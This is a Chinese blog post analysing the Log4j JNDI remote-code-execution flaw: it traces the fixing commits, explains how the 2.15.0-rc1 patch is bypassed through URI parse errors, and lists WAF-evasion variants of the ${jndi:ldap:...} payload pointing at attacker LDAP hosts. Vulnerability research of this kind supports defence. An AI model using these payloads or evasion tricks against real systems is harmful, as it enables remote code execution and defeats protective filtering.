<返回更多

如何跟踪log4j漏洞原理及发现绕WAF的tips

2021-12-22    IT野涵
加入收藏
如何跟踪log4j漏洞原理及发现绕WAF的tips

 

log4j漏洞的形成原因已经有很多分析文章了,这里说一说我是如何在了解到有漏洞后,跟进漏洞产生原理的,以及发现的一些绕WAF tips

跟进漏洞产生原因的思路

如何发现漏洞产生的原因的

了解到log4j <=2.14.1 存在RCE的情况,我马上跑到其官方github看了一下,发现commit记录中有两个关键commit

如何跟踪log4j漏洞原理及发现绕WAF的tips

 

这两个点很容易联想到是不是跟JNDI攻击有关系,毕竟RMI和LDAP很容易做到RCE。跟进commit看看具体的修改情况,
https://github.com/Apache/logging-log4j2/commit/d82b47c6fae9c15fcb183170394d5f1a01ac02d3 这个commit中,对
org.apache.logging.log4j.core.NET.JndiManager.JAVA进行了大量修改,特别是在lookup方法中,加了很多代码

【私信回复“资料”获取log4j的复现/修复教程】点击查看网络安全学习攻略

如何跟踪log4j漏洞原理及发现绕WAF的tips

 

仔细看了一下,没有修改前,lookup方法直接通过this.context.lookup(name)执行JNDI操作,没有任何过滤或者限制,而新增加的代码在限制JNDI服务器、类。当天晚上看到payload后,马上对log4j 2.14.1版本尝试验证一下,并在JndiManager#lookup方法中断点看到如下

如何跟踪log4j漏洞原理及发现绕WAF的tips

 

很明显,name就是payload中给定的,仔细看一下调用栈就可以发现,log4j会对字符串中的${}自动解析,也就是前面提到的commit备注信息中写到的。

如何绕过2.15.0-rc1版本

看到rc1版本存在绕过的消息,又来看看官方github仓库的commit记录,里面有一条在更新到2.15.0-rc1版本后的commit记录,提交的信息是"handle URI exception",即处理了URI出错的情况。修改代码的情况如下图

如何跟踪log4j漏洞原理及发现绕WAF的tips

 

JndiManager#lookup方法处给catch语句中添加了两行代码,记录URI解析错误并返回null。而添加这两行代码前,此处只有一行注释,因此catch报错后会继续向下执行this.context.lookup,也就意味着前面try语句中的代码报错后,会继续执行JNDI操作,绕过也就来自于这里。

来看看try语句是怎么写的

如何跟踪log4j漏洞原理及发现绕WAF的tips

 

代码比较长没有完全截进来,关键点是进入lookup方法后,立即将name变量送入URI类的构造函数中,此时只要URI的构造函数对name字符串解析出错,即可跳转到catch语句,进而向下执行到JNDI操作。

那么我们要关注的点就是让new URI(name)处报错,但是name又能被jndi正常识别。好在我们用marshalsec构造ldap服务时,不需要关心uri长什么样,所以可以在uri上做文章。

跟踪源代码可以查看到URI对字符的支持情况

如何跟踪log4j漏洞原理及发现绕WAF的tips

 

数字、字母大小写这些就不说了,其它可打印字符也不多,从上面的注释中可以看到URI对反引号`,空格,尖括号<>并不支持,基于这一点,可以做个简单的实验

如何跟踪log4j漏洞原理及发现绕WAF的tips

 

空格和括号同样报错,就不重复截图了。回到前面提到的2.15.0-rc1版本对JndiManager#lookup方法的修复情况,并没有在catch语句中添加返回操作或报错,程序遇到报错后,会继续向下执行,从而造成危险。

由于找了很久都没有找到log4j-core-2.15.0-rc1.jar这个包,所以自己写了个函数模拟一下绕过的场景

如何跟踪log4j漏洞原理及发现绕WAF的tips

 

LDAP绕WAF的tips

URI解析

看完rc1版本的绕过后,又想了一下,防御工具可能会有针对性的做一些关键字检测,所以我打算从LDAP更深层的源代码看看有没有对字符串变形的可能性。

跟着this.context.lookup(name)处向下跟进到
com.sun.jndi.url.ldap.LdapURLContextFactory#getUsingURLIgnoreRootDN方法,代码如下

如何跟踪log4j漏洞原理及发现绕WAF的tips

 

注意var0也就是输入是完整的"
ldap://192.168.34.96:1389:/a",而后var2可以使用getHost和getPort方法获取host和port,说明var2对象在创建时解析了ldap地址。跟进LdapURL类到达Uri#parse方法

private void parse(String var1) throws MalformedURLException {
    int var2 = var1.indexOf(58);
    if (var2 < 0) {
        throw new MalformedURLException("Invalid URI: " + var1);
    } else {
        this.scheme = var1.substring(0, var2);
        ++var2;
        this.hasAuthority = var1.startsWith("//", var2);
        int var3;
        if (this.hasAuthority) {
            var2 += 2;
            var3 = var1.indexOf(47, var2);
            if (var3 < 0) {
                var3 = var1.length();
            }

            int var4;
            if (var1.startsWith("[", var2)) {
                var4 = var1.indexOf(93, var2 + 1);
                if (var4 < 0 || var4 > var3) {
                    throw new MalformedURLException("Invalid URI: " + var1);
                }

                this.host = var1.substring(var2, var4 + 1);
                var2 = var4 + 1;
            } else {
                var4 = var1.indexOf(58, var2);
                int var5 = var4 >= 0 && var4 <= var3 ? var4 : var3;
                if (var2 < var5) {
                    this.host = var1.substring(var2, var5);
                }

                var2 = var5;
            }

            if (var2 + 1 < var3 && var1.startsWith(":", var2)) {
                ++var2;
                this.port = Integer.parseInt(var1.substring(var2, var3));
            }

            var2 = var3;
        }

        var3 = var1.indexOf(63, var2);
        if (var3 < 0) {
            this.path = var1.substring(var2);
        } else {
            this.path = var1.substring(var2, var3);
            this.query = var1.substring(var3);
        }

    }
}

此时var1="
ldap://192.168.34.96:1389/a"

后面解析path和query的部分就不看了,回到
com.sun.jndi.url.ldap.LdapURLContextFactory#getUsingURLIgnoreRootDN也就是上面那个图片的位置,此时host和port都解析好了,正式开启发起ldap请求

LDAP发起


com.sun.jndi.url.ldap.LdapURLContextFactory#getUsingURLIgnoreRootDN,执行到new LdapCtx("", var2.getHost(), var2.getPort(), var1, var2.useSsl()),即此时LdapURL已经解析完成,host和port都有了,跟进LdapCtx的构造方法,代码如下

public LdapCtx(String var1, String var2, int var3, Hashtable<?, ?> var4, boolean var5) throws NamingException {
    this.useSsl = this.hasLdapsScheme = var5;
    if (var4 != null) {
        this.envprops = (Hashtable)var4.clone();
        if ("ssl".equals(this.envprops.get("java.naming.security.protocol"))) {
            this.useSsl = true;
        }

        this.trace = (OutputStream)this.envprops.get("com.sun.jndi.ldap.trace.ber");
        if (var4.get("com.sun.jndi.ldap.netscape.schemaBugs") != null || var4.get("com.sun.naming.netscape.schemaBugs") != null) {
            this.netscapeSchemaBug = true;
        }
    }

    this.currentDN = var1 != null ? var1 : "";
    this.currentParsedDN = parser.parse(this.currentDN);
    this.hostname = var2 != null && var2.length() > 0 ? var2 : "localhost";
    if (this.hostname.charAt(0) == '[') {
        this.hostname = this.hostname.substring(1, this.hostname.length() - 1);
    }

    if (var3 > 0) {
        this.port_number = var3;
    } else {
        this.port_number = this.useSsl ? 636 : 389;
        this.useDefaultPortNumber = true;
    }

    this.schemaTrees = new Hashtable(11, 0.75F);
    this.initEnv();

    try {
        this.connect(false);
    } catch (NamingException var9) {
        try {
            this.close();
        } catch (Exception var8) {
        }

        throw var9;
    }
}

这里主要关注hostname和port_number两个参数,即下面的代码块

this.hostname = var2 != null && var2.length() > 0 ? var2 : "localhost";
if (this.hostname.charAt(0) == '[') {
    this.hostname = this.hostname.substring(1, this.hostname.length() - 1);
}

if (var3 > 0) {
    this.port_number = var3;
} else {
    this.port_number = this.useSsl ? 636 : 389;
    this.useDefaultPortNumber = true;
}

其中var2=LdapURL中解析的host,var3=LdapURL中解析的port

这些逻辑是变换ldap字符串的关键

Bypass WAF tips

根据前面LdapURL和LdapCtx的解析逻辑,可以对log4j的payload做出如下变换

${jndi:ldap:192.168.1.1/a}
${jndi:ldap:192.168.1.1:/a}
注意此时需要ldap服务端口为389
如何跟踪log4j漏洞原理及发现绕WAF的tips

 

前面两个类的解析逻辑中都有对中括号[]的处理,所以给ip添加一下包裹

${jndi:ldap://[192.168.34.96]/a}
${jndi:ldap://[192.168.34.96]]/a} 
LdapURL取出"[ip]",LdapCtx去除[]获得ip,两种情况下端口都是389
${jndi:ldap:/a}
此时相当于ldap://localhost:389/a

这种情况主要是来自于LdapURL解析URL时出错,导致host=null,port=-1,而后LdapCtx中发现host=null,则将host置为localhost,毕竟这样做看起来是可信的

原理是,LdapURL解析时有个关键处理如下

this.hasAuthority = var1.startsWith("//", var2);   // var2=第一个冒号的索引
if (hasAuthority){
    解析获取host和port
}

此时不出现://这个整体,就可以直接跳出host和port的获取,而后在LdapCtx中对host=null时,赋值为localhost,对port=默认值-1时,赋值为389

如何跟踪log4j漏洞原理及发现绕WAF的tips

 

这个payload需要在目标上执行命令或其它方式开启ldap和文件下载服务,但都可以在目标上执行命令了,还需要这样干吗?所以有点鸡肋,除非java程序的权限比可以执行命令的用户权限更高,从而拿到更高权限(不过提权姿势也很多啊)

通过upperCase、fastjson的unicode编码等方法可以避免该关键字,具体就不重复写,直接引用浅蓝师傅的博客了
https://b1ue.cn/archives/513.html

另外可以对log4j解析${}的部分深入了解一下,还能通过其自身特性,避免直接出现jndi:ldap关键字,但不是自己研究出来的就不公开了

声明:本站部分内容来自互联网,如有版权侵犯或其他问题请与我们联系,我们将立即删除或处理。
▍相关推荐
更多资讯 >>>